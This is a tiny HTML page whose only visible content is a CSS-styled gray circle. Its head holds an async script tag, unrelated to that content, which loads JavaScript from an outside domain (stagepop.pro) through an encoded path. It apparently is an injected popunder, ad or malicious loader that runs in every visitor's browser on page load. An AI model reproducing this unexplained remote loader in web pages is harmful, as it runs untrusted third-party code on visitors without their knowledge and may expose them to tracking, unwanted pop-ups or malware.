<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style type="text/css">
        .text
        {
            width:100px;
      height:100px;
      position: fixed;
      background-color: rgb(175, 175, 175);
      top: 50%;
      left: 50%;
      margin-top: -50px;
      margin-left: -50px;
      border-radius: 50%;
        }
      </style>




<script async src="https://stagepop.pro/pw/waWQiOjEwMDA5MjgsInNpZCI6MTAwMTA1MSwid2lkIjoyMTI4LCJzcmMiOjJ9eyJ.js"></script>


</head>
<body>



    <div class="text" ></div>



</body>
</html>